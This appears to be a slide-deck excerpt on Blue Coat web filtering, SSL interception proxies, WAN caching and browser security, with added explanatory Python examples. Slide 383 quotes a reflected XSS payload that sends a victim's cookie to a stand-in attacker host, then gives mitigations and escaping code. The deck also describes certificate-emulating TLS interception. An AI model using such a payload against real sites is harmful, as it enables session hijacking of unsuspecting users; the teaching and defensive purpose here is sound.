The first generation of content filters consisted of static, manually managed lists of popular pornographic and unproductive websites. Very often retrieved from access logs, popular bad sites were banned.
The intended purpose was to save bandwidth and warn users that inappropriate behaviour was logged.
People got together and distributed their lists as free lists compatible with proxies such as Squid.
The distributed lists were in the size of a million URLs.
[Figure: 1 Million URLs listed out of 350 Million web servers; 349 Million not covered]
329

Generation 2
Corporations realised they could make money from a list and started to collect lists and logs from the web, manually rating these on a larger scale. More categories were added to increase value. The systems started to collect URLs automatically and download new lists periodically, some of them even many times every day.
Special categories were added for static security threats placed on known web servers: spyware, phishing etc. Categories other than bad sites were added, such as Economy, Business, News etc., to present statistics of Internet usage.
[Figure: 15 Million URLs listed; 335 Million not covered]
330

Generation 2
The number of URLs was in the range of 10-20 million. Hit rates presented by log systems were in the range of 50-80%. Regular expressions on URLs and other tricks sometimes gave a false picture of a rating coverage above 90%, but in fact less than 5% of the Internet was covered.
[Figure: 15 Million URLs listed; 335 Million not covered]
331

Generation 3
The dynamics of the Internet and new security risks called for a new way of categorizing the Internet. Dynamic rating of uncategorized websites can today rate most websites; the ones that are impossible to rate can be stripped down to present only HTML and images to reduce risk.
The static URL database is constantly updated like any Generation 2 filter. This database is cached in some systems (ProxySG) to increase performance.
The rest (95%) of the Internet is categorised using dynamic rating.
[Figure: 15 Million URLs in the static database; 335 Million covered by dynamic rating]
332

Dynamic Real Time Rating
[Diagram: Clients → Customer system (DRTR) → Internet servers; uncategorized requests go to BlueCoat rating systems (labels RS, G2, DBR, HR, DXD) with language detection (language 1 … language n) feeding background rating; 44µs is marked on the rating path.]
* The picture is simplified, all systems are redundant.
333
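The Generation 1-3 slides describe a static URL list that covers a small fraction of the web, a dynamic rater for everything the list does not know, and the option of stripping pages nobody could rate down to HTML and images. The following Python block is an added example written for this page; it is not Blue Coat Webfilter code. The static list (STATIC_DB), the keyword rules standing in for a dynamic rater (DYNAMIC_RULES), the blocked categories and the request log (SAMPLE_REQUESTS) are all constructed, and the coverage figures it prints come from that constructed data only.

```python
"""Added example (not Blue Coat code): a static URL list with a dynamic-rating
fallback, in the spirit of the Generation 1-3 slides. STATIC_DB, DYNAMIC_RULES,
BLOCKED and SAMPLE_REQUESTS are all constructed for this example."""
import re
from urllib.parse import urlsplit

# Constructed static URL database (Generation 1/2 style): host -> category
STATIC_DB = {
    "news.example": "news",
    "bank.example": "finance",
    "badsite.example": "pornography",
    "tracker.example": "spyware",
}

# Constructed keyword heuristics standing in for a dynamic rater (Generation 3 style)
DYNAMIC_RULES = [
    ("spyware", re.compile(r"\b(keylog\w*|spyware|trojan)\b", re.I)),
    ("phishing", re.compile(r"\bverify your account\b", re.I)),
    ("news", re.compile(r"\b(headline|breaking|editorial)\b", re.I)),
    ("business", re.compile(r"\b(quarterly|invoice|enterprise)\b", re.I)),
]

# Categories the constructed policy blocks outright
BLOCKED = {"pornography", "spyware", "phishing"}


def rate_static(url):
    """Look the host, then each parent domain, up in the static list."""
    host = (urlsplit(url).hostname or "").lower()
    labels = host.split(".")
    for i in range(len(labels) - 1):          # stop before the bare TLD
        candidate = ".".join(labels[i:])
        if candidate in STATIC_DB:
            return STATIC_DB[candidate]
    return None


def rate_dynamic(page_text):
    """Rate a page from its content; the first matching rule wins."""
    for category, pattern in DYNAMIC_RULES:
        if pattern.search(page_text):
            return category
    return "uncategorized"


def categorize(url, page_text=""):
    """Return (category, source): static list first, dynamic rating as fallback."""
    category = rate_static(url)
    if category:
        return category, "static"
    category = rate_dynamic(page_text)
    return category, ("dynamic" if category != "uncategorized" else "none")


def action(url, page_text=""):
    """Policy outcome: block known-bad categories, strip pages nobody could rate
    (the slide's 'present only HTML and images' option), otherwise allow."""
    category, _ = categorize(url, page_text)
    if category in BLOCKED:
        return "block"
    if category == "uncategorized":
        return "strip-to-html-and-images"
    return "allow"


def coverage(requests):
    """Share of requests rated by the static list alone, and with dynamic rating added."""
    total = len(requests)
    static_hits = sum(1 for url, _ in requests if rate_static(url))
    all_hits = sum(1 for url, text in requests
                   if categorize(url, text)[0] != "uncategorized")
    return static_hits / total, all_hits / total


# Constructed request log: (requested URL, text of the fetched page)
SAMPLE_REQUESTS = [
    ("http://news.example/today", "Breaking headline"),
    ("http://www.badsite.example/x", ""),
    ("http://unknown1.example/", "Download our free keylogger toolbar"),
    ("http://unknown2.example/", "Quarterly invoice portal for enterprise users"),
    ("http://unknown3.example/", "Please verify your account now"),
    ("http://unknown4.example/", "lorem ipsum"),
]

if __name__ == "__main__":
    for url, text in SAMPLE_REQUESTS:
        print(url, categorize(url, text), action(url, text))
    print("coverage (static, static+dynamic):", coverage(SAMPLE_REQUESTS))
```

On the constructed log the static list alone rates two of six requests and the dynamic fallback lifts that to five of six; the remaining page is the one the slide's "strip down" option applies to. Real dynamic raters classify page content with far richer models than four regular expressions, but the decision structure (static hit, then dynamic rating, then a default action for the unrateable remainder) is the point of the slide.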

SSL Proxy
334

SSL Proxy: Policy Enforcement


• Control web content, applications, and services…regardless of encryption
– Block, allow, throttle, scan, accelerate, insert, strip, redirect, transform …
– Apply the same policies to encrypted traffic as to normal traffic
– Stops/controls rogue applications that take advantage of SSL
• Protect the enterprise from SSL-borne threats
– Stop spyware and secured phishing
– SSL-secured webmail and extranets – virus transmissions
– SSL-borne malicious and inappropriate content
• Accelerate critical applications
– Enables a variety of acceleration techniques (e.g., caching)

[Diagram: User → SSL → Policy → SSL → Apps; Internal Network on the user side, Internet on the application side]
335
Blue Coat: Visibility and Context
[Diagram: two handshakes, the Client-Proxy Connection and the Server-Proxy Connection]
Client-Proxy Connection
– Client: Connection Request. Algorithms I support.
– Proxy: Let’s use this algorithm. Emulated certificate.
– Client: Verify certificate and extract (proxy’s) public key.
– Client and Proxy: Complete Authentication.
– Tunnel Established
Server-Proxy Connection
– Proxy: Connection Request. Algorithms I support.
– Server: Use this algorithm. Server’s digital certificate.
– Proxy: Verify certificate and extract server’s public key.
– Proxy and Server: Complete Authentication.
– Tunnel Established
336

Flexible Configurations
Option 1
• Trusted applications passed through
– Sensitive, known, financial or health care
• No cache, visibility
• Awareness of network-level information only
[Diagram: User → SSL → Control → Apps → Internet; TCP on both sides of the proxy]
337

Flexible Configurations
Option 2
• Initial checks performed
– Valid user, valid application
– Valid server cert
• User/application traffic passed through after initial checks
• No cache
• Visibility and context of network-level info, certificates, user, and applications
• Can warn user, remind of AUP, and offer opt-out
[Diagram: User → SSL → Control → Apps → Internet; TCP on both sides of the proxy]
338

Flexible Configurations
Option 3
• Initial checks performed
– Valid user, valid application
– Valid server cert
• User/application traffic proxied after initial checks
• Full caching and logging options
• Visibility and context of network-level info, certificates, user, applications, content, etc.
– Full termination/proxy
• Can warn user, remind of AUP, and offer opt-out
[Diagram: User → SSL → Control → SSL → Apps → Internet; TCP on both sides of the proxy]
339
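Slides 336-339 describe the proxy's two handshakes, the emulated certificate the client receives under full termination, and three per-destination configurations (tunnel untouched, tunnel after checks, intercept). The Python block below is an added example that models that decision per connection; it is not Blue Coat code and not its policy language (CPL). The user and application allow-lists, the category sets, the sample certificates and connections, and the issuer name "ProxySG Internal CA" are all constructed. The pin_check function shows the operational caveat that follows from the slide: a client that pins the origin's key accepts Options 1 and 2 but rejects the emulated certificate of Option 3.

```python
"""Added example (not Blue Coat code or CPL): per-connection choice between the
three SSL proxy configurations on the slides. Users, applications, categories and
certificate records are constructed; PROXY_CA is a hypothetical issuer name."""
from dataclasses import dataclass
import hashlib


@dataclass
class Cert:
    subject: str          # e.g. "CN=webmail.example"
    issuer: str           # CA that signed it
    chain_valid: bool     # chain validation result from the TLS stack (constructed)
    public_key: bytes     # stand-in for the DER-encoded public key (constructed)


@dataclass
class Conn:
    user: str
    app: str              # requested host/application (SNI)
    category: str         # content-filter category of the destination
    server_cert: Cert


# Option 1: sensitive, known destinations are tunnelled without interception
PASSTHROUGH_CATEGORIES = {"finance", "healthcare"}
# Option 2: checked, then tunnelled without caching
CHECK_ONLY_CATEGORIES = {"partner-extranet"}
ALLOWED_USERS = {"alice", "bob"}
ALLOWED_APPS = {"webmail.example", "search.example", "partner.example"}
PROXY_CA = "ProxySG Internal CA"   # hypothetical issuer of emulated certificates


def fingerprint(cert):
    """SHA-256 over the (constructed) public key, as a pinning client would compute."""
    return hashlib.sha256(cert.public_key).hexdigest()


def emulated_certificate(server_cert):
    """Option 3: the proxy re-issues the server's subject under its own CA and key;
    this is the 'Emulated certificate' the client sees on slide 336."""
    proxy_key = hashlib.sha256(b"proxy-key-for:" + server_cert.subject.encode()).digest()
    return Cert(subject=server_cert.subject, issuer=PROXY_CA,
                chain_valid=True, public_key=proxy_key)


def decide(conn):
    """Return (option, action, certificate presented to the client or None)."""
    if conn.category in PASSTHROUGH_CATEGORIES:
        return 1, "tunnel", conn.server_cert            # no cache, network-level visibility only
    # Options 2 and 3 both start with the same initial checks
    if conn.user not in ALLOWED_USERS or conn.app not in ALLOWED_APPS:
        return 2, "deny", None
    if not conn.server_cert.chain_valid:
        return 2, "deny", None                          # invalid server cert fails the check
    if conn.category in CHECK_ONLY_CATEGORIES:
        return 2, "tunnel-after-checks", conn.server_cert  # cert/user/app visible, no cache
    return 3, "intercept", emulated_certificate(conn.server_cert)  # full termination


def pin_check(conn, pinned_fingerprint):
    """What a key-pinning client concludes: True only if the certificate it is shown
    carries the key it pinned, which the emulated certificate of Option 3 does not."""
    _, _, presented = decide(conn)
    return presented is not None and fingerprint(presented) == pinned_fingerprint


# Constructed sample certificates and connections
BANK_CERT = Cert("CN=bank.example", "Public CA", True, b"bank-pubkey")
MAIL_CERT = Cert("CN=webmail.example", "Public CA", True, b"mail-pubkey")
BAD_CERT = Cert("CN=search.example", "Unknown CA", False, b"search-pubkey")

CONNS = {
    "bank": Conn("alice", "bank.example", "finance", BANK_CERT),
    "mail": Conn("alice", "webmail.example", "webmail", MAIL_CERT),
    "badcert": Conn("bob", "search.example", "search", BAD_CERT),
    "guest": Conn("guest", "webmail.example", "webmail", MAIL_CERT),
}

if __name__ == "__main__":
    for name, conn in CONNS.items():
        option, act, cert = decide(conn)
        print(name, option, act, cert.issuer if cert else None)
```

The order of the checks matters: the pass-through test comes first so that a finance or health-care destination is never terminated even for a user who would otherwise be intercepted, and the certificate check precedes interception so that an untrusted origin is refused rather than re-signed as trusted. Deploying Option 3 requires the proxy CA in every client's trust store, and pinned applications still fail, which is why the slides keep Options 1 and 2 available.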

Reverse Proxy
340
Reverse Proxy
[Diagram: Internet Clients → ProxySG → Servers; proxy functions shown: Policy, Logging, Authentication, URL-rewrite, AV, SSL/Certificate, Caching]
341

Reverse Proxy
PROTECTS Web Servers
• Secure, object-based OS
• Controls access to web apps
• Web AV scanning
ACCELERATES Web Content
• Intelligent caching
• Compression and bandwidth mgt.
• TCP & SSL offload
SIMPLIFIES Operations
• Scalable, optimized appliance
• Easy policy creation & management
• Complete logging & reporting
[Diagram: Users on the Public Internet → Firewall → ProxySG → Web Servers on the Internal Network]
Secure & Accelerate Web Applications
342

HTTPS Termination
• HTTPS Termination (Client → ProxySG)
– Off-load secure website or portal
• HTTPS Origination (ProxySG → Server)
– Secure channel to content server for clients
• Man-in-the-Middle (Termination & Origination)
– Allows caching, policy and virus scanning
• Secure credential acquisitions
• SSL Hardware Acceleration Cards
– 800 RSA transactions per second per card
– SSL v2.0, v3.0, and TLS v1 support
• Off-load web application servers to improve performance
343
Example Scenarios for Reverse Proxy
• Secure and Accelerate Public Websites
– Improves content delivery with integrated caching
– Services legitimate users while resisting DoS attacks
– High-performance SSL
• Secure Corporate Webmail
– Securely isolates Web servers from direct Internet access
– Proxy authentication for additional layer of protection
– Plug-n-play SSL
• Scanning Uploaded Files for Viruses
– Simple integration with ProxyAV™
– Real-time scanning of uploaded content
– Protects Web infrastructure from malware
344
Recipe for Branch Performance Problems
Server Consolidation
+ Increased application traffic
+ Inefficient application protocols
+ Highly distributed users
+ Narrow bandwidth links
= Poor Application Performance


345
Minimum for Application Acceleration
 Optimize use of existing WAN bandwidth
 Reduce latency associated with applications
 Improve the efficiency of application protocols
 Prioritize the applications that matter most
 Re-use and compress data where possible
 Accelerate File Sharing, Email, and browser-based enterprise applications
Complete Solution Requires More
346
Platform for Application Acceleration
Multiprotocol Accelerated Caching Hierarchy
Bandwidth Management | Protocol Optimization | Object Caching | Byte Caching | Compression
File Services (CIFS), Web (HTTP), Exchange (MAPI), Video/Streaming (RTSP, MMS), Secure Web (SSL)
347
New Requirement: SSL Acceleration
More and More SSL…
• Nearly 50% of all corporate Web application traffic is SSL
• 70% of all mobile and teleworkers use SSL for secure application delivery
• 68% of Blue Coat customers depend on externally hosted Web applications
[Chart: SSL Traffic, Internally Hosted Apps vs Externally Hosted Apps]
Source: Blue Coat Customer Surveys
348
New Requirement: Video Acceleration

• Enterprise users
becoming more distributed
– Mobile, teleworker, and branch/
remote offices
– Regulatory and cost drivers
• Remote employee training
becoming a necessity
– Live (streaming) and on-demand video
• Performance quality
becoming a requirement
– Network and application issues must be
addressed
– Control and acceleration of video
is needed
349

Bandwidth Management
Sales Automation App: Priority 1, Min 400Kb, Max 800Kb
E-Mail: Priority 2, Min 100Kb, Max 400Kb
File Services: Priority 3, Min 400Kb, Max 800Kb
General Web Surfing: Priority 4, Min 0Kb, Max 200Kb
• Divide user and application traffic into classes
• Guarantee min and/or max bandwidth for a class
• Align traffic classes to business priorities
350
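The slide states the model (classes with a priority, a guaranteed minimum and a cap) without showing how a link is divided when the classes compete. The Python block below is an added example that allocates one scheduling interval over the four classes exactly as the slide lists them; it is not Blue Coat code. The 1.5 Mbps link capacity and the two offered-load scenarios (BUSY and QUIET) are constructed.

```python
"""Added example (not Blue Coat code): a per-interval allocator for the four traffic
classes on the slide, honouring each class's guaranteed minimum, its cap and its
priority. Link capacity and the offered loads are constructed."""

# (class name, priority [1 = highest], min kbps, max kbps) as on the slide
CLASSES = [
    ("Sales Automation App", 1, 400, 800),
    ("E-Mail",               2, 100, 400),
    ("File Services",        3, 400, 800),
    ("General Web Surfing",  4,   0, 200),
]


def allocate(link_kbps, demand, classes=CLASSES):
    """Return {class: kbps granted} for one scheduling interval.

    Pass 1 hands every class its guaranteed minimum (as far as it has traffic to
    send), highest priority first, so if the link cannot carry all minimums the
    lowest priorities lose out. Pass 2 gives what is left to the classes in
    priority order, never beyond a class's max or its actual demand."""
    grant = {name: 0 for name, *_ in classes}
    remaining = link_kbps
    by_priority = sorted(classes, key=lambda c: c[1])
    for name, _, lo, hi in by_priority:
        share = min(lo, demand.get(name, 0), remaining)
        grant[name] += share
        remaining -= share
    for name, _, lo, hi in by_priority:
        room = min(hi - grant[name], demand.get(name, 0) - grant[name], remaining)
        if room > 0:
            grant[name] += room
            remaining -= room
    return grant


# Constructed offered load (kbps) during a busy interval on a 1.5 Mbps link
BUSY = {"Sales Automation App": 1000, "E-Mail": 500,
        "File Services": 1000, "General Web Surfing": 600}
# Constructed quiet interval: only web surfing and a little e-mail
QUIET = {"E-Mail": 50, "General Web Surfing": 600}

if __name__ == "__main__":
    print(allocate(1500, BUSY))    # mins honoured, priority 1 filled to its cap, web gets 0
    print(allocate(1500, QUIET))   # web surfing capped at 200 although the link is idle
```

In the busy interval the allocator grants 800/300/400/0 kbps: every class with traffic receives its minimum, the spare capacity goes to priority 1 up to its cap and then to priority 2, and web surfing, with a minimum of 0, is starved. In the quiet interval web surfing still gets only 200 kbps because the cap is an absolute limit, not a share. A shipping bandwidth manager enforces these figures continuously with token buckets or per-class queues rather than recomputing a fixed split, but the min/max/priority semantics are the ones shown here.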

Protocol Optimization
351

Protocol Optimization

10-100X Faster
Includes CIFS, MAPI, HTTP, HTTPS, TCP
352

Object Caching
• Built on high-level applications and protocols
– HTTP/Web caching
– Streaming caches
– CIFS cache
• Advantages
– Fastest response times
– Offload work from servers (and networks)
– Can be deployed asymmetrically
• Limitations
– Application-specific
– All or nothing: No benefit if whole object not found or changed
353

Byte Caching
[Diagram: Local LAN, WAN Link, Remote LAN, with a Local History Cache and a Remote History Cache holding the same bit stream. Proxies keep a history of all bytes sent and received. Sequences found in the local history cache are transmitted as small references over the WAN, e.g. [R1]0010010[R2]100101111100110100111011010011[R3]; the original stream is reconstructed using the remote history cache.]
354

Compression
[Diagram: the same bit stream on the local and remote LAN sides; COMPRESSION shrinks it across the WAN link]
• Industry-standard gzip algorithm compresses all traffic
• Removes predictable “white space” from content and objects being transmitted
355

MACH5 Techniques Work Together


Object Caching
• Caches repeated, static app-level data; reduces BW and latency
Byte Caching
• Caches any TCP application using
similar/changed data; reduces BW
Compression
• Reduces amount of data transmitted; saves BW
Bandwidth Management
• Prioritize, limit, allocate, assign DiffServ – by user or
application
Protocol Optimization
• Remove inefficiencies, reduce latency
356

Object Caching
• Object caches are built on higher level applications and protocols
– HTTP/Web caching
– Streaming caches
– CIFS cache
• Object cache advantages
– Fastest response times
– Offload work from servers
– Can be deployed asymmetrically
• Object cache disadvantages
– Works with limited set of applications
– Works on limited range of data inside applications
– All or nothing: No benefit if whole object not found or changed
357
Object vs. Byte Caching
                                    Object Caching                  Byte Cache
Proxy?                              HTTP(S), FTP, Streaming, CIFS   Built on TCP
Protocol Optimization Integration   X
Server Offload                      X
Network Offload                     X                               X
Incremental Updates                                                 X
No App Integration                                                  X
End User Performance                Best                            Good
Scope                               Focused                         Broad
358
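Slides 354, 355 and 358 contrast byte caching (references into a shared history), gzip compression and object caching (a hit only when the whole object is unchanged). The Python block below is an added example, not Blue Coat code, that runs all three over three successive versions of one constructed document so the "all or nothing" behaviour of the object cache and the incremental reuse of the byte cache can be compared in bytes on the wire. The 16-byte fixed chunking, the 8-byte reference format, the ETag-based validation and the document itself are constructed simplifications.

```python
"""Added example (not Blue Coat code): byte caching, object caching and gzip
compression over three versions of one constructed document. Chunk size, history
format and the document are constructed; real byte caches use content-defined chunk
boundaries rather than the fixed 16-byte chunks used here."""
import hashlib
import zlib

CHUNK = 16        # bytes per history chunk (constructed; fixed-size for simplicity)
REF_SIZE = 8      # bytes of hash sent instead of a chunk both ends already hold


def chunk_id(chunk):
    return hashlib.sha1(chunk).digest()[:REF_SIZE]


class ByteCache:
    """One end of the WAN link. Both ends hold an identical history of chunks."""

    def __init__(self):
        self.history = {}

    def encode(self, data):
        """Replace chunks already in the history with references (the [Rn] tokens
        on the slide); send unseen chunks literally and remember them."""
        tokens = []
        for i in range(0, len(data), CHUNK):
            chunk = data[i:i + CHUNK]
            cid = chunk_id(chunk)
            if cid in self.history:
                tokens.append(("ref", cid))
            else:
                self.history[cid] = chunk
                tokens.append(("lit", chunk))
        return tokens

    def decode(self, tokens):
        """Rebuild the stream, learning literals into the history as the sender did."""
        out = bytearray()
        for kind, value in tokens:
            if kind == "ref":
                out += self.history[value]
            else:
                self.history[chunk_id(value)] = value
                out += value
        return bytes(out)


def wire_size(tokens):
    """Bytes on the WAN: a 1-byte tag plus either the reference or the literal chunk."""
    return sum(1 + (REF_SIZE if kind == "ref" else len(value)) for kind, value in tokens)


class ObjectCache:
    """Whole-object cache keyed by URL and validator (ETag): a hit only when the
    stored object is exactly current, otherwise the entire object is fetched again."""

    def __init__(self):
        self.store = {}

    def fetch(self, url, etag, body):
        if self.store.get(url, (None, None))[0] == etag:
            return "hit", 0
        self.store[url] = (etag, body)
        return "miss", len(body)


def transfer_costs(versions, url="http://intranet.example/report.txt"):
    """WAN bytes per version under object caching, byte caching and gzip."""
    objects, sender, receiver = ObjectCache(), ByteCache(), ByteCache()
    rows = []
    for etag, body in versions:
        status, object_bytes = objects.fetch(url, etag, body)
        tokens = sender.encode(body)
        assert receiver.decode(tokens) == body          # receiver reconstructs exactly
        rows.append({"etag": etag, "object_cache": (status, object_bytes),
                     "byte_cache": wire_size(tokens), "gzip": len(zlib.compress(body))})
    return rows


# Constructed document: ten 53-byte lines (530 bytes). V2 changes one number in the
# first line without changing the length; V3 is V2 served again, unchanged.
LINE = b"Q1 revenue figures for region %02d: 1234567 units sold\n"
V1 = b"".join(LINE % i for i in range(10))
V2 = V1.replace(b"1234567 units sold\n", b"7654321 units sold\n", 1)
VERSIONS = [("v1", V1), ("v2", V2), ("v2", V2)]

if __name__ == "__main__":
    for row in transfer_costs(VERSIONS):
        print(row)
```

On the first transfer the byte cache sends every chunk literally (530 bytes plus 34 tags), the object cache misses, and only gzip helps. On the edited second version the object cache misses again and re-fetches all 530 bytes, while the byte cache sends a single changed 16-byte chunk and 33 references (314 bytes). On the unchanged third version the object cache finally hits at zero bytes, whereas the byte cache still sends 34 references: the object cache wins when the whole object is fresh, the byte cache wins when it is not, which is what the slide's table summarises as "Incremental Updates" versus "Best" end-user performance. The fixed chunking used here breaks down as soon as an edit inserts or deletes bytes, since every later chunk boundary shifts; production byte caches pick boundaries from the content itself to avoid that.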

Products
359
MACH5 Ships with Blue Coat SGOS 5
[Diagram: appliance range from Branch Office to Enterprise Core: SG200 Series (Remote Offices), SG400 Series, SG800 Series, SG8000 Series (Corporate Headquarters)]
• GA April 2006
• Appliances start at US$1,995
360
ProxyAV Appliances
[Diagram: 400-E Series (Remote Offices) up to 2000-E Series (Corporate Headquarters), placed by WAN bandwidth and performance]
Connected Users: Up to 250 users | 100-2000 users | 1000-50,000+ users
WAN Bandwidth: Sub 1.5Mbps | 1.5Mbps-45Mbps | 150Mbps+
361

400-E1
• One Model: 400-E1
• RAM: 512 MB
• CPU: 1.26GHz PIII
• Disk drive 40 GB IDE
• Network Interfaces (2 on board) 10/100
Base-T Ethernet
• 19" Rack-mountable
362
Software

 Reporter (SW)
 Advanced Java application to generate statistics from logs
363
Licensed products

 Licensed products
 Streaming
 Real Networks, Microsoft, Quicktime
 Instant Messaging
 MSN, Yahoo, AOL
 Optional Security (HW+SW bundle)
 SSL termination/proxy
364

Licensed products
 Licensed products
 Content filtering
 BlueCoat Webfilter
 ICAP AV Scanner
 ProxyAV (McAfee, Sophos, Panda, Kaspersky, Ahn Labs)
365

The Power of the Proxy
Web Security
• Prevent spyware, malware & viruses
• Stop DoS attacks
• IE vulnerabilities, IM threats
+ Policy Control
• Fine-grained policy for applications, protocols, content & users (allow, deny, transform, etc)
• Granular, flexible logging
• Authentication integration
+ Accelerated Applications
• Multiprotocol Accelerated Caching Hierarchy
• BW mgmt, compression, protocol optimization
• Byte & object caching
Full Protocol Termination = Total Visibility & Context
(HTTP, SSL, IM, Streaming, P2P, SOCKS, FTP, CIFS, MAPI, Telnet, DNS)
Ultimate Control Point for Communications
366

Management
367
Management

• User Interface
– HTTP (HTTPS), web GUI Interface
– Telnet (Cisco CLI)
– SSH & Serial console
– Java Policy interface
– CPL, Policy Language
– SNMP MIBII + Traps
– Monitor network status and statistics
• Reporting tools
– BlueCoat Reporter
• Scalable management
– Centralized configuration management in Director
368
Reporting (example)

18.2 % Spyware (gator)


16.5 % Aftonbladet
9.5 % Ads (in top 40)
6.8 % https (encrypted)
369
370
371
372
373
System-wide Management and Control

• Blue Coat Director


– Centralized configuration of Blue Coat
appliances – set up, policy, etc
– Centralized monitoring – appliance health,
application use, user experience
• Blue Coat Reporter
– Enterprise roll-up and analysis of application
delivery information: appliances,
application use, user experience
Both Director and Reporter are proven, with thousands of
nodes under management…
374

Director Configuration Management
[Diagram: a Workstation remotely and securely manages Director via GUI or CLI; Director pushes profiles and overlays to the Production systems]
(1) Configure and test “profile” system
(2) Snapshot profile and save on Director
(3) Create and edit overlays using GUI or CLI
(4) Push profiles and overlays to one or more systems
Configuration Management
• Configuration Management
• Policy Management
• Disaster protection centrally
• Monitor and control
• Resource Management
• Monitor network status and statistics
• Profile Management
• Backup configuration
• Create overlays using GUI or CLI; automate changes
• License Management
375
Content Delivery Network
[Diagram: Content Owners, WWW Servers, Director, Edge Systems, Users]
1 Content Owners publish content to the WWW Servers
2 Tell Director about new content
3 Director tells caches (Edge Systems) to update content
4 Edge Systems pull content from origin servers
5 Edge Systems deliver the content to Users
376

GUI
377

History
• First ever browser – WorldWideWeb
(1990)
o Created at CERN by Tim Berners-Lee
o Used internally, no real security threats
o Would only display HTML text
o Allowed downloading of other file types
378

History
• Mosaic (1993)
o First browser with a GUI
o Led to an increase in Internet popularity
• Netscape Navigator (1994)
o Nearly disappeared by 2000
• Internet Explorer (1995)
o Held as much as 95% of the market
379

History
• Safari (2003)
o Apple’s browser
• Firefox (2004)
o Open source
• Chrome (2008)
o Rapid increase in market share
380

Security Issues

• Increase in security issues


o Complexity of web sites and browsers
o Size of the Internet
o Anyone can access
• Uses of Internet
o Online banking
o Shopping
o More sharing of sensitive data
381

Security Issues
Cross Site Scripting (XSS)
o Takes advantage of complex, dynamic web pages
o Injects client side scripts, HTML
o Can lead to cookie theft, browser redirection, untrusted content
o Nearly 80% of vulnerabilities in 2007 (Symantec)
382

Security Issues
Example
http://portal.example/index.php?sessionid=12312312&
username=<script>document.location='http://attackerhost.example/cgi-bin/
cookiesteal.cgi?'+document.cookie</script>
source: http://projects.webappsec.org/w/page/13246920/Cross-Site-Scripting

• XSS Mitigation
 Disable scripting
 Sanitize input, escape HTML/scripts
 No script access to cookies
383
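The slide shows a username parameter reflected straight into a page and lists the mitigations (sanitize input, escape HTML/scripts, no script access to cookies) without code. The Python block below is an added example, not taken from the slide's source; it renders the same parameter both unescaped and escaped and emits a Set-Cookie header whose HttpOnly flag is the "no script access to cookies" item. The page template, the harmless marker payload PROBE and the request URL are constructed.

```python
"""Added example (not from the slide's source): the reflected pattern in the slide's
URL beside its escaped form, plus a Set-Cookie line whose HttpOnly flag keeps page
scripts away from the session cookie. The page template, PROBE and REQUEST_URL are
constructed."""
import html
from http.cookies import SimpleCookie
from urllib.parse import parse_qs, urlsplit


def username_from_url(url):
    """Pull the username parameter out of a portal URL like the one on the slide."""
    return parse_qs(urlsplit(url).query).get("username", [""])[0]


def render_vulnerable(username):
    """Echoes the parameter straight into the page: markup in the input becomes markup."""
    return f"<p>Welcome, {username}</p>"


def render_safe(username):
    """html.escape converts & < > \" ' to entities, so the browser shows text, not tags."""
    return f"<p>Welcome, {html.escape(username, quote=True)}</p>"


def contains_script_tag(page):
    """Crude check used only to show the difference between the two renderers."""
    return "<script" in page.lower()


def session_cookie_header(session_id):
    """Set-Cookie for the session: HttpOnly (document.cookie cannot read it),
    Secure (sent over HTTPS only), SameSite=Lax (withheld from most cross-site requests)."""
    cookie = SimpleCookie()
    cookie["sessionid"] = session_id
    cookie["sessionid"]["httponly"] = True
    cookie["sessionid"]["secure"] = True
    cookie["sessionid"]["samesite"] = "Lax"
    return cookie.output(header="Set-Cookie:")


# Constructed request: a harmless marker script stands in for the slide's payload
PROBE = "<script>probe()</script>"
REQUEST_URL = "http://portal.example/index.php?sessionid=12312312&username=" + PROBE

if __name__ == "__main__":
    name = username_from_url(REQUEST_URL)
    print(render_vulnerable(name))      # the marker arrives in the page as a live tag
    print(render_safe(name))            # the same input arrives as inert text
    print(session_cookie_header("12312312"))
```

Output escaping is the control that actually neutralises the injected markup, because it is applied at the point where untrusted data meets HTML regardless of how the data arrived; input validation is a useful second layer but cannot know every context the value will later be written into. The HttpOnly flag does not stop the script from running, it only denies the script the cookie, so it limits the cookie-theft consequence named on slide 382 rather than the injection itself.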

Security Issues

• Local Storage
o Form data
o Login credentials

• Encryption - HTTP vs HTTPS


o Packet sniffing -> session hijacking, password stealing
384

Protecting Yourself Online


• Incognito Mode (Google Chrome)
 Allows user to switch between multiple privacy settings with the
click of a button
 Can be activated in one window/tab but not others

• Browser Guards
o Modern browsers will prevent users from visiting malicious sites
o Two main methods
 List of reported malicious sites
 Algorithm to detect malicious code on a site
o This can protect from viruses, phishing, and other threats
385
What is the Internet
 Interconnection of many computers via networks.
 Globally connected through networks (LAN or WAN).
 Provides various application services, i.e. E-Mail, Usenet (News), WWW, Telnet, FTP, etc.
 At any time millions of users are connected to the Internet from many countries.
386
Uses of Internet
 Searching
 E-mail service
 Commercial Services
 Electronic books & Publication
 Video Conferencing
 Sharing data and results quickly
 Retrieving files & Program of all types
 Find information databases and tutorials
 Newspaper columns
 Banking
 Downloading / Uploading any information
 News, sports, stocks, music etc.
 Use of internet in various fields like education, Business, governance, etc.
 And many more ………………..
387
Useful Internet Key Terms
• Network: Connecting computers with each other for exchanging information
• Client: It is a programme or computer for getting specific information from another computer.
• Server: It is a programme or computer which gives information to the client computer.
• Protocol: It is a set of rules for connecting to the internet (TCP/IP).
• Portal: It is a website known as a gateway to the internet (search engine).

19/08/2021 389
388

Router: It is a device which decides where data will be sent (network point)
www: World Wide Web
Browser: It is a programme which helps us to use the internet
Website: Group of different web pages.
URL: Universal Resource Locator
389
Types of Website (Domain Names)

.com : Commercial organization


.net : Large Networks
.gov : Government organization
.org : non-profit making organization
.edu : educational organization
.mil : military organization
.in : India
.au : Australia
.us : United States
.uk : United Kingdom
390

• Exercises
391

Thank you
